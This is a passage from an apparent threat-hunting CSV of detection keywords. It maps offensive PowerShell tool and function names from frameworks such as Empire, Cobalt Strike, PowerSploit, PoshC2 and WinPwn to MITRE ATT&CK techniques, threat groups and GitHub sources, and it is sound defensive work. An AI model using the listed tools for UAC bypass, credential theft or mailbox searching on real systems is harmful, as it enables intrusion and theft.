+"*Invoke-EnvBypass.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1125","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-EssessAgress*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"*invoke-eternalblue*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*Invoke-EventHunter*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*invoke-eventhunter*","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","8","738","102","2023-10-02T14:57:20Z","2016-07-06T13:25:09Z"
+"*Invoke-EventViewer *.exe*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z"
+"*Invoke-EventViewer.ps1*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z"
+"*Invoke-EventVwrBypass*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z"
+"*Invoke-EventVwrBypass*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-EventVwrBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-ExecuteMSBuild*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ExecuteMSBuild.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-ExecuteMSBuild.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1090","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-ExploitableLeakedHandlesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-Eyewitness*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-FakeLogonScreen*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-Farmer*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*invokefilefinder*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z"
+"*Invoke-FileFinder*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z"
+"*Invoke-FileFinder*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*Invoke-FodHelperBypass*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-FodHelperBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-FodHelperBypass*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1127","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-ForgeUserAgent*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z"
+"*Invoke-Get-RBCD-Threaded*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-Get-RBCD-Threaded*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-GlobalMailSearch*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-GlobalMailSearch*","offensive_tool_keyword","MailSniper","To search all mailboxes in a domain","T1595 T1114 T1590 T1591 T1114","N/A","N/A","N/A","Reconnaissance","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-GlobalO365MailSearch*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-GoFetch*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","1","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" +"*Invoke-Gopher*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-GPPPasswordCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-GPPPasswordCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-Grouper2*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy 
usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Grouper2*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Grouper3*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Grouper3*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-HandleKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-HandleKatz*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Handlekatz*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-HardenedUNCPathCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-HijackableDllsCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-HijackableDllsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-HoneypotBuster*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral 
Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","1","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" +"*Invoke-HostEnum -*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","0","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" +"*invoke-hostenum -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 
